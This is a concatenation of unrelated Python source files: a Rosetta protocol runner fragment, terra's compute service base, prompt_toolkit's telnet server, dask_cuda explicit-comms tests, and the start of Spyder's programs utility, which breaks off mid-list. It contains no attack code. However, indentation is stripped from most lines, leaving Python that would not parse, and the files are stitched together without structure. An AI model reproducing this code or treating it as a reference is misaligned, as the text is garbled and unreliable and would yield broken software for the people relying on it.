start_energy_score = self.score_class.score(self.pose)
self.output_class.terminal_output.set(1); #Redirect to stdout. For multiprocessing and major Rosetta output.
if self.output_class.processors.get()>1:
            #Multiprocessing is done manually because the mover is unpicklable - hence no Queue or Pool objects.
#First, we have an array of jobs:
workers = []
for i in range(1, self.output_class.decoys.get()+1):
outname = self.pdb_name+"_"+repr(i)+".pdb"
worker = Process(name = repr(i), target=self._run_mover, args=(mover, outname))
workers.append(worker)
total_allowed_jobs = self.output_class.processors.get()
print "Total allowed jobs: "+repr(total_allowed_jobs)
total_running_jobs = 0
job_complete=False
#Check if any PDB's already exist. Delete them or pop the workers depending on the overwrite option:
for worker in workers:
if os.path.exists(self.pdb_name+"_"+worker.name+".pdb"):
if self.output_class.overwrite.get():
os.remove(self.pdb_name+"_"+worker.name+".pdb")
print "Overwriting "+self.pdb_name+"_"+worker.name+".pdb"
else:
workers.pop(workers.index(worker))
print self.pdb_name+"_"+worker.name+".pdb already exists. Skipping. "
#Run the protocol
while not job_complete:
time.sleep(5)
for worker in workers:
if worker.is_alive():
pass
#print "Worker is alive"
#total_running_jobs+=1; #Increment total_running_jobs
elif os.path.exists(self.pdb_name+"_"+worker.name+".pdb"):
if worker.exitcode!=0:
print "%s.exitcode = %s" %(worker.name, worker.exitcode)
workers.pop(workers.index(worker)); #If the job is done, pop it.
total_running_jobs-=1
print "Total running jobs: "+repr(total_running_jobs)
print "Total workers waiting: "+repr(len(workers)-total_running_jobs)
if len(workers)==0:
job_complete=True
break
if total_running_jobs<total_allowed_jobs:
for worker in workers:
if ((not worker.is_alive())and (not os.path.exists(self.pdb_name+"_"+worker.name+".pdb"))):
print "Starting Worker"
try:
worker.start()
except AssertionError:
continue
total_running_jobs+=1
print "Total running jobs: "+repr(total_running_jobs)
print "Total workers waiting: "+repr(len(workers)-total_running_jobs)
if total_running_jobs>=total_allowed_jobs: break
if total_running_jobs==0:
job_complete=True
while len(multiprocessing.active_children()) != 0: time.sleep(1)
else:
mc = MonteCarlo(self.pose, self.score_class.score, self.output_class.kT)
for i in range(1, self.output_class.rounds.get()+1):
mover.apply(self.pose)
if self.output_class.use_boltzmann.get():
if mc.boltzmann(self.pose):
print "MC: Pose Accepted"
if self.output_class.rounds.get()>1:
print "Round"+repr(i)+": "+ repr(self.score_class.score(self.pose))+" REU"
if self.output_class.recover_low.get():
mc.recover_low(self.pose)
mc.show_scores()
mc.show_counters()
print "Start: "+ repr(start_energy_score)+" REU"
print "End: "+repr(self.score_class.score(self.pose))+" REU"
            #Here we output the decoy if the user wishes, overwriting if necessary.
if self.output_class.decoys.get()==1:
outpath = self.pdb_name+"_1.pdb"
if os.path.exists(outpath):
if self.output_class.overwrite.get():
os.remove(outpath)
self.output_pose(self.pose, outpath)
print "PDB exists. Overwriting."
else:
print "PDB exists. Skipping output."
else:
self.output_pose(self.pose, outpath)
print "Setting decoy as current pose."
self.output_class.terminal_output.set(0); #Reset output to textbox
if self.output_class.decoys.get()>1:
print "Original decoy still loaded."
print "Job Complete. Any decoys written to output directory."
return
def _run_mover(self, mover, outputname):
"""
Used for multiprocessing.
"""
        #Reinitialize Rosetta to reset its options and, in particular, the random SEED.
self.input_class.options_manager.re_init()
        p = Pose(); #Copy the pose so that each process works on a different pose object. Probably unnecessary.
p.assign(self.pose)
print outputname
start = self.score_class.score(p)
mc = MonteCarlo(p, self.score_class.score, self.output_class.kT)
for x in range(1, self.output_class.rounds.get()+1):
mover.apply(p)
if self.output_class.use_boltzmann.get():
if mc.boltzmann(p):
print "MC: Pose Accepted"
if self.output_class.recover_low.get():
mc.recover_low(p)
self.output_pose(p, outputname)
print "Start: " +repr(start)+" REU"
print "End: " +repr(self.score_class.score(p))+" REU"
def output_pose(self, p, outputname):
"""
Output pose function for ProtocolBaseClass.
"""
p.dump_pdb(outputname)
score_tag = ".fasc"
if not p.is_fullatom():
score_tag = ".sc"
scorefile = self.pdb_name + score_tag
output_scorefile(p, self.input_class.pdb_path.get(), outputname, scorefile, self.score_class.score, self.output_class.decoys.get(), self.pose)
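# Illustrative sketch (not part of the original toolkit): run_protocol above
# manages multiprocessing by hand because movers are not picklable, so Pool and
# Queue cannot be used. Its loop boils down to the pattern below - keep at most
# max_running Process objects alive and poll until every job has finished.
# job_functions is a hypothetical list of zero-argument callables.
def _worker_loop_sketch(job_functions, max_running):
    pending = [Process(target=job) for job in job_functions]
    running = []
    while pending or running:
        running = [worker for worker in running if worker.is_alive()]
        while pending and len(running) < max_running:
            worker = pending.pop()
            worker.start()
            running.append(worker)
        time.sleep(0.5)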
|
base.py
|
import ast
import os
import time
import atexit
from logging import StreamHandler
from logging.handlers import SocketHandler
import threading
import warnings
from terra import settings
import terra.compute.utils
from terra.executor import Executor
from terra.logger import (
getLogger, LogRecordSocketReceiver, SkipStdErrAddFilter
)
logger = getLogger(__name__)
class ServiceRunFailed(Exception):
''' Exception thrown when a service runner returns non-zero
'''
class BaseService:
'''
The base class for all Terra Service definitions
  ``super().__init__`` should be called when inheriting a :class:`BaseService`
class's ``__init__``
Service definitions can define a ``pre_{command}`` and ``post_{command}``
  functions that will be called before and after a ``{command}Service`` call,
if they exist
'''
def __init__(self):
self.env = os.environ.copy()
self.volumes = []
    ''' A copy of the process's environment variables, local to the service '''
def _env_array(self, key):
'''
Recover array environment variables
For example, define the following in ``terra.env``
.. code-block:: bash
SOMETHING=( "hello" "there" )
array_to_python_ast_list_of_strings SOMETHING_AST "${SOMETHING[@]}"
Services can recover the environment variable as a python compatible
array via
.. code-block:: python
self._env_array('SOMETHING_AST')
'''
return ast.literal_eval(self.env[key])
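    # Illustrative example (not part of the original class): if the environment
    # contains SOMETHING_AST='["hello", "there"]', then
    # self._env_array('SOMETHING_AST') returns the list ['hello', 'there'],
    # because ast.literal_eval parses the value as a Python literal.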
def _validate_volume(self, local, remote,
check_remote=True,
local_must_exist=False):
'''
Validate volume inputs. Raise a :class:`ValueError` under any of the
following conditions:
- ``local`` is empty or None
- ``check_remote`` is True and ``remote`` is empty or None
- ``local_must_exist`` is True and ``local`` file/folder does not exist
Raises
------
ValueError
see conditions above
'''
if not local:
raise ValueError('local file/folder must be specified')
elif check_remote and not remote:
raise ValueError('remote file/folder must be specified')
elif local_must_exist and not os.path.exists(local):
raise ValueError('local file/folder does not exist {}'
.format(local))
def add_volume(self, local, remote, flags=None, prefix=None,
local_must_exist=False):
'''
Add a volume to the service
'''
self._validate_volume(local, remote, local_must_exist=local_must_exist)
self.volumes.append((local, remote))
def pre_run(self):
'''
A function that runs before the run service
All service classes should implement at least ``run_service``, as this is
the quintessential call in running a service. ``pre_run`` in
:class:`terra.compute.base.BaseService` is mainly responsible for handling
Executors that need a separate volume translation
'''
# The executor volume map is calculated on the host side, where all the
    # information is available. For example, if using docker and celery, then
    # the docker config needs to be run to get the container volumes, and that has
# to be run on the host machine. So this is calculated here.
settings.executor.volume_map = Executor.configuration_map(self)
logger.debug4("Executor Volume map: %s", settings.executor.volume_map)
def post_run(self):
pass
class AlreadyRegisteredException(Exception):
'''
Exception thrown if a function has already been registered
'''
class BaseCompute:
'''
The base class for all Terra Service Compute Arches
'''
@classmethod
def register(cls, service):
'''
Used to register a function for a particular service using a specific
compute
'''
service_name = f'{service.__module__}.{service.__qualname__}'
def wrapper(impl):
if service_name not in services:
services[service_name] = {}
if cls in services[service_name]:
raise AlreadyRegisteredException(f'Service {service_name} already '
'registered')
services[service_name][cls] = impl
return impl
return wrapper
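    # Illustrative usage sketch (not part of the original module), with
    # hypothetical DockerCompute and MyService classes:
    #
    #   @DockerCompute.register(MyService)
    #   class MyService_docker(MyService):
    #     pass
    #
    # After this, services['<module>.MyService'][DockerCompute] holds the
    # implementation used when the docker compute is active.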
def __getattr__(self, name):
implementation = name + '_service'
# Default implementation caller
try:
# super hasattr
self.__getattribute__(implementation)
except AttributeError:
raise AttributeError(f'Compute command "{name}" does not have a service '
f'implementation "{implementation}"') from None
def defaultCommand(self, service_class, *args, **kwargs):
service_info = terra.compute.utils.load_service(service_class)
# Check and call pre_ call
pre_call = getattr(service_info, 'pre_' + name, None)
if pre_call:
pre_call(*args, **kwargs)
# Call command implementation
rv = self.__getattribute__(implementation)(
service_info, *args, **kwargs)
# Check and call post_ call
post_call = getattr(service_info, 'post_' + name, None)
if post_call:
post_call(*args, **kwargs)
return rv
defaultCommand.__doc__ = f'''The {name} command for {__class__.__qualname__}
The {name} command will call a service's pre_{name} if it has one,
followed by the {implementation}, and then the service's post_{name} if
it has one.
Calls {implementation}''' # noqa
defaultCommand.__name__ = name
defaultCommand.__qualname__ = type(self).__qualname__ + '.' + name
# bind function and return it
return defaultCommand.__get__(self, type(self))
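# Illustrative (hypothetical) call pattern for the dynamic dispatch above:
# accessing ``compute.run`` returns a bound ``defaultCommand`` that loads the
# registered service, calls its ``pre_run`` (if defined), then the compute's
# ``run_service``, then the service's ``post_run``:
#
#   compute = DockerCompute()
#   compute.run(MyService)   # pre_run -> run_service -> post_run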
def get_volume_map(self, config, service_info):
return []
def run_service(self, *args, **kwargs):
'''
Placeholder for code that runs an instance in the compute. Runs
``create`` and then runs and returns ``start`` by default.
'''
self.create(*args, **kwargs)
return self.start(*args, **kwargs)
def configuration_map_service(self, service_info):
'''
Returns the mapping of volumes from the host to the remote
Returns
-------
list
Return a list of tuple pairs [(host, remote), ... ] of the volumes
mounted from the host to remote
'''
return service_info.volumes
@staticmethod
def configure_logger(sender, **kwargs):
if settings.terra.zone == 'controller':
# Setup log file for use in configure
if settings.logging.log_file:
os.makedirs(os.path.dirname(settings.logging.log_file), exist_ok=True)
sender._log_file = settings.logging.log_file
else:
sender._log_file = os.devnull
os.makedirs(settings.processing_dir, exist_ok=True)
sender._log_file = open(sender._log_file, 'a')
sender.main_log_handler = StreamHandler(stream=sender._log_file)
sender.root_logger.addHandler(sender.main_log_handler)
# setup the TCP socket listener
sender.tcp_logging_server = LogRecordSocketReceiver(
settings.logging.server.listen_address,
settings.logging.server.port)
listener_thread = threading.Thread(
target=sender.tcp_logging_server.serve_until_stopped)
listener_thread.daemon = True
listener_thread.start()
# Wait up to a second, to make sure the thread started
for _ in range(1000):
if sender.tcp_logging_server.ready:
break
time.sleep(0.001)
else: # pragma: no cover
warnings.warn("TCP Logging server thread did not startup. "
"This is probably not a problem, unless logging isn't "
"working.", RuntimeWarning)
# Auto cleanup
@atexit.register
def cleanup_thread():
sender.tcp_logging_server.abort = 1
listener_thread.join(timeout=5)
if listener_thread.is_alive(): # pragma: no cover
warnings.warn("TCP Logger Server Thread did not shut down "
"gracefully. Attempting to exit anyways.",
RuntimeWarning)
elif settings.terra.zone == 'runner':
sender.main_log_handler = SocketHandler(
settings.logging.server.hostname, settings.logging.server.port)
# All runners have access to the master controller's stderr by virtue of
# running on the same host. By default, we go ahead and let them log
# there. Consequently, there is no need for the master controller to echo
# out the log messages a second time.
sender.main_log_handler.addFilter(SkipStdErrAddFilter())
sender.root_logger.addHandler(sender.main_log_handler)
@staticmethod
def reconfigure_logger(sender, **kwargs):
# sender is logger in this case
#
# The default logging handler is a StreamHandler. This will reconfigure its
# output stream
if settings.terra.zone == 'controller':
if settings.logging.log_file:
os.makedirs(os.path.dirname(settings.logging.log_file), exist_ok=True)
log_file = settings.logging.log_file
else:
log_file = os.devnull
# Check to see if _log_file is unset. If it is, reconfigure was called
# without configure having been called first. While it is not important
# that this case works, it mostly matters for unit testing
# if not os.path.samefile(log_file, sender._log_file.name):
if getattr(sender, '_log_file', None) is not None and \
log_file != sender._log_file.name:
os.makedirs(settings.processing_dir, exist_ok=True)
sender._log_file.close()
sender._log_file = open(log_file, 'a')
elif settings.terra.zone == 'runner':
# Only if it's changed
if settings.logging.server.hostname != sender.main_log_handler.host or \
settings.logging.server.port != sender.main_log_handler.port:
# Reconnect Socket Handler
sender.main_log_handler.close()
try:
sender.root_logger.removeHandler(sender.main_log_handler)
except ValueError: # pragma: no cover
pass
sender.main_log_handler = SocketHandler(
settings.logging.server.hostname, settings.logging.server.port)
sender.root_logger.addHandler(sender.main_log_handler)
services = {}
|
server.py
|
"""
Telnet server.
Example usage::
class MyTelnetApplication(TelnetApplication):
def client_connected(self, telnet_connection):
# Set CLI with simple prompt.
telnet_connection.set_application(
telnet_connection.create_prompt_application(...))
def handle_command(self, telnet_connection, document):
# When the client enters a command, just reply.
telnet_connection.send('You said: %r\n\n' % document.text)
...
a = MyTelnetApplication()
TelnetServer(application=a, host='127.0.0.1', port=23).run()
"""
from __future__ import unicode_literals
import socket
import select
import threading
import os
import fcntl
from six import int2byte, text_type, binary_type
from codecs import getincrementaldecoder
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.eventloop.base import EventLoop
from prompt_toolkit.interface import CommandLineInterface, Application
from prompt_toolkit.layout.screen import Size
from prompt_toolkit.shortcuts import create_prompt_application
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.terminal.vt100_output import Vt100_Output
from .log import logger
from .protocol import IAC, DO, LINEMODE, SB, MODE, SE, WILL, ECHO, NAWS, SUPPRESS_GO_AHEAD
from .protocol import TelnetProtocolParser
from .application import TelnetApplication
__all__ = (
'TelnetServer',
)
def _initialize_telnet(connection):
logger.info('Initializing telnet connection')
# Iac Do Linemode
connection.send(IAC + DO + LINEMODE)
# Suppress Go Ahead. (This seems important for Putty to do correct echoing.)
# This will allow bi-directional operation.
connection.send(IAC + WILL + SUPPRESS_GO_AHEAD)
# Iac sb
connection.send(IAC + SB + LINEMODE + MODE + int2byte(0) + IAC + SE)
# IAC Will Echo
connection.send(IAC + WILL + ECHO)
# Negotiate window size
connection.send(IAC + DO + NAWS)
class _ConnectionStdout(object):
"""
Wrapper around socket which provides `write` and `flush` methods for the
Vt100_Output output.
"""
def __init__(self, connection, encoding):
self._encoding = encoding
self._connection = connection
self._buffer = []
def write(self, data):
assert isinstance(data, text_type)
self._buffer.append(data.encode(self._encoding))
self.flush()
def flush(self):
try:
self._connection.send(b''.join(self._buffer))
except socket.error as e:
logger.error("Couldn't send data over socket: %s" % e)
self._buffer = []
class TelnetConnection(object):
"""
Class that represents one Telnet connection.
"""
def __init__(self, conn, addr, application, server, encoding):
assert isinstance(addr, tuple) # (addr, port) tuple
assert isinstance(application, TelnetApplication)
assert isinstance(server, TelnetServer)
assert isinstance(encoding, text_type) # e.g. 'utf-8'
self.conn = conn
self.addr = addr
self.application = application
self.closed = False
self.handling_command = True
self.server = server
self.encoding = encoding
self.callback = None # Function that handles the CLI result.
# Create "Output" object.
self.size = Size(rows=40, columns=79)
# Initialize.
_initialize_telnet(conn)
# Create output.
def get_size():
return self.size
self.stdout = _ConnectionStdout(conn, encoding=encoding)
self.vt100_output = Vt100_Output(self.stdout, get_size, write_binary=False)
# Create an eventloop (adaptor) for the CommandLineInterface.
self.eventloop = _TelnetEventLoopInterface(server)
# Set default CommandLineInterface.
self.set_application(create_prompt_application())
# Call client_connected
application.client_connected(self)
# Draw for the first time.
self.handling_command = False
self.cli._redraw()
def set_application(self, app, callback=None):
"""
Set ``CommandLineInterface`` instance for this connection.
(This can be replaced any time.)
:param app: Application instance.
:param callback: Callable that takes the result of the CLI.
"""
assert isinstance(app, Application)
assert callback is None or callable(callback)
self.cli = CommandLineInterface(
application=app,
eventloop=self.eventloop,
output=self.vt100_output)
self.callback = callback
# Create a parser, and parser callbacks.
cb = self.cli.create_eventloop_callbacks()
inputstream = InputStream(cb.feed_key)
# Input decoder for stdin. (Required when working with multibyte
# characters, like Chinese input.)
stdin_decoder_cls = getincrementaldecoder(self.encoding)
stdin_decoder = [stdin_decoder_cls()] # nonlocal
# Tell the CLI that it's running. We don't start it through the run()
# call, but will still want _redraw() to work.
self.cli._is_running = True
def data_received(data):
""" TelnetProtocolParser 'data_received' callback """
assert isinstance(data, binary_type)
try:
result = stdin_decoder[0].decode(data)
inputstream.feed(result)
except UnicodeDecodeError:
stdin_decoder[0] = stdin_decoder_cls()
return ''
def size_received(rows, columns):
""" TelnetProtocolParser 'size_received' callback """
self.size = Size(rows=rows, columns=columns)
cb.terminal_size_changed()
self.parser = TelnetProtocolParser(data_received, size_received)
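# Hypothetical usage sketch (names illustrative): swap in a new prompt and
# collect the result through the callback, which receives the connection
# and the returned document:
#
#   def on_result(connection, document):
#       connection.send('Got: %r\n' % document.text)
#
#   telnet_connection.set_application(
#       create_prompt_application(message='> '), callback=on_result)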
def feed(self, data):
"""
Handler for incoming data. (Called by TelnetServer.)
"""
assert isinstance(data, binary_type)
self.parser.feed(data)
# Render again.
self.cli._redraw()
# When a return value has been set (enter was pressed), handle command.
if self.cli.is_returning:
try:
return_value = self.cli.return_value()
except (EOFError, KeyboardInterrupt) as e:
# Control-D or Control-C was pressed.
logger.info('%s, closing connection.', type(e).__name__)
self.close()
return
# Handle CLI command
self._handle_command(return_value)
def _handle_command(self, command):
"""
Handle command. This will run in a separate thread, in order not
to block the event loop.
"""
logger.info('Handle command %r', command)
def in_executor():
self.handling_command = True
try:
if self.callback is not None:
self.callback(self, command)
finally:
self.server.call_from_executor(done)
def done():
self.handling_command = False
# Reset state and draw again. (If the connection is still open --
# the application could have called TelnetConnection.close().)
if not self.closed:
self.cli.reset()
self.cli.buffers[DEFAULT_BUFFER].reset()
self.cli.renderer.request_absolute_cursor_position()
self.vt100_output.flush()
self.cli._redraw()
self.server.run_in_executor(in_executor)
def erase_screen(self):
"""
Erase output screen.
"""
self.vt100_output.erase_screen()
self.vt100_output.cursor_goto(0, 0)
self.vt100_output.flush()
def send(self, data):
"""
Send text to the client.
"""
assert isinstance(data, text_type)
# When data is sent back to the client, we should replace the line
# endings. (We didn't allocate a real pseudo terminal, and the telnet
# connection is raw, so we are responsible for inserting \r.)
self.stdout.write(data.replace('\n', '\r\n'))
self.stdout.flush()
def close(self):
"""
Close the connection.
"""
self.application.client_leaving(self)
self.conn.close()
self.closed = True
class _TelnetEventLoopInterface(EventLoop):
"""
Eventloop object to be assigned to `CommandLineInterface`.
"""
def __init__(self, server):
self._server = server
def close(self):
" Ignore. "
def stop(self):
" Ignore. "
def run_in_executor(self, callback):
self._server.run_in_executor(callback)
def call_from_executor(self, callback, _max_postpone_until=None):
self._server.call_from_executor(callback)
def add_reader(self, fd, callback):
raise NotImplementedError
def remove_reader(self, fd):
raise NotImplementedError
class TelnetServer(object):
"""
Telnet server implementation.
"""
def __init__(self, host='127.0.0.1', port=23, application=None, encoding='utf-8'):
assert isinstance(host, text_type)
assert isinstance(port, int)
assert isinstance(application, TelnetApplication)
assert isinstance(encoding, text_type)
self.host = host
self.port = port
self.application = application
self.encoding = encoding
self.connections = set()
self._calls_from_executor = []
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
@classmethod
def create_socket(cls, host, port):
# Create and bind socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(4)
return s
def run_in_executor(self, callback):
threading.Thread(target=callback).start()
def call_from_executor(self, callback):
self._calls_from_executor.append(callback)
if self._schedule_pipe:
os.write(self._schedule_pipe[1], b'x')
def _process_callbacks(self):
"""
Process callbacks from `call_from_executor` in eventloop.
"""
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
# Process calls from executor.
calls_from_executor, self._calls_from_executor = self._calls_from_executor, []
for c in calls_from_executor:
c()
def run(self):
"""
Run the eventloop for the telnet server.
"""
listen_socket = self.create_socket(self.host, self.port)
logger.info('Listening for telnet connections on %s port %r', self.host, self.port)
try:
while True:
# Remove closed connections.
self.connections = set([c for c in self.connections if not c.closed])
# Ignore connections handling commands.
connections = set([c for c in self.connections if not c.handling_command])
# Wait for next event.
read_list = (
[listen_socket, self._schedule_pipe[0]] +
[c.conn for c in connections])
read, _, _ = select.select(read_list, [], [])
for s in read:
# When the socket itself is ready, accept a new connection.
if s == listen_socket:
self._accept(listen_socket)
# If we receive something on our "call_from_executor" pipe, process
# these callbacks in a thread safe way.
elif s == self._schedule_pipe[0]:
self._process_callbacks()
# Handle incoming data on socket.
else:
self._handle_incoming_data(s)
finally:
listen_socket.close()
def _accept(self, listen_socket):
"""
Accept new incoming connection.
"""
conn, addr = listen_socket.accept()
connection = TelnetConnection(conn, addr, self.application, self, encoding=self.encoding)
self.connections.add(connection)
logger.info('New connection %r %r', *addr)
def _handle_incoming_data(self, conn):
"""
Handle incoming data on socket.
"""
connection = [c for c in self.connections if c.conn == conn][0]
data = conn.recv(1024)
if data:
connection.feed(data)
else:
self.connections.remove(connection)
|
test_explicit_comms.py
|
import multiprocessing as mp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.shuffle import partitioning_index
from distributed import Client
from distributed.deploy.local import LocalCluster
import dask_cuda
from dask_cuda.explicit_comms import comms
from dask_cuda.explicit_comms.dataframe.merge import merge as explicit_comms_merge
from dask_cuda.explicit_comms.dataframe.shuffle import shuffle as explicit_comms_shuffle
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice, all of the following tests are executed in a new process so
# that the UCX options of the different tests don't conflict.
async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
c = comms.CommsContext(client)
assert sum(c.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = explicit_comms_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge_empty_partitions(nrows, npartitions):
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=npartitions,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame({"key": key, "payload2": np.arange(nrows)})
expected = df1.merge(df2).set_index("key")
ddf1 = dd.from_pandas(df1, npartitions=npartitions)
ddf2 = dd.from_pandas(df2, npartitions=npartitions)
ddf3 = explicit_comms_merge(ddf1, ddf2, on=["key"]).set_index("key")
got = ddf3.compute()
pd.testing.assert_frame_equal(got, expected)
def test_dataframe_merge_empty_partitions():
# Notice, we use more partitions than rows
p = mp.Process(target=_test_dataframe_merge_empty_partitions, args=(2, 4))
p.start()
p.join()
assert not p.exitcode
def check_partitions(df, npartitions):
"""Check that all values in `df` hashes to the same"""
hashes = partitioning_index(df, npartitions)
if len(hashes) > 0:
return len(hashes.unique()) == 1
else:
return True
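# For example (illustrative): after an explicit-comms shuffle on "key" into N
# output partitions, every row that lands in a given partition should map to
# that partition's index under partitioning_index(part, N), so the unique
# count per partition is 1 and check_partitions returns True.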
def _test_dataframe_shuffle(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
all_workers = list(client.get_worker_logs().keys())
comms.default_comms()
np.random.seed(42)
df = pd.DataFrame({"key": np.random.random(100)})
if backend == "cudf":
df = cudf.DataFrame.from_pandas(df)
for input_nparts in range(1, 5):
for output_nparts in range(1, 5):
ddf = dd.from_pandas(df.copy(), npartitions=input_nparts).persist(
workers=all_workers
)
ddf = explicit_comms_shuffle(
ddf, ["key"], npartitions=output_nparts
).persist()
assert ddf.npartitions == output_nparts
# Check that each partition of `ddf` hashes to the same value
result = ddf.map_partitions(
check_partitions, output_nparts
).compute()
assert all(result.to_list())
# Check the values of `ddf` (ignoring the row order)
expected = df.sort_values("key")
got = ddf.compute().sort_values("key")
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 3])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_shuffle(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_shuffle, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dask_use_explicit_comms():
def check_shuffle(in_cluster):
"""Check if shuffle use explicit-comms by search for keys named "shuffle"
The explicit-comms implemention of shuffle doesn't produce any keys
named "shuffle"
"""
ddf = dd.from_pandas(pd.DataFrame({"key": np.arange(10)}), npartitions=2)
with dask.config.set(explicit_comms=False):
res = ddf.shuffle(on="key", npartitions=4, shuffle="tasks")
assert any(["shuffle" in str(key) for key in res.dask])
with dask.config.set(explicit_comms=True):
res = ddf.shuffle(on="key", npartitions=4, shuffle="tasks")
if in_cluster:
assert all(["shuffle" not in str(key) for key in res.dask])
else: # If not in cluster, we cannot use explicit comms
assert any(["shuffle" in str(key) for key in res.dask])
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=2,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
check_shuffle(True)
check_shuffle(False)
def test_dask_use_explicit_comms():
p = mp.Process(target=_test_dask_use_explicit_comms)
p.start()
p.join()
assert not p.exitcode
def _test_jit_unspill(protocol):
import cudf
from cudf.tests.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with dask_cuda.LocalCUDACluster(
protocol=protocol,
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
jit_unspill=True,
device_memory_limit="1B",
) as cluster:
with Client(cluster):
np.random.seed(42)
df = cudf.DataFrame.from_pandas(
pd.DataFrame({"key": np.random.random(100)})
)
ddf = dd.from_pandas(df.copy(), npartitions=4)
ddf = explicit_comms_shuffle(ddf, ["key"])
# Check the values of `ddf` (ignoring the row order)
expected = df.sort_values("key")
got = ddf.compute().sort_values("key")
assert_eq(got, expected)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_jit_unspill(protocol):
pytest.importorskip("cudf")
p = mp.Process(target=_test_jit_unspill, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from distutils.version import LooseVersion
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return the temporary Spyder directory, creating it if it does not exist.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
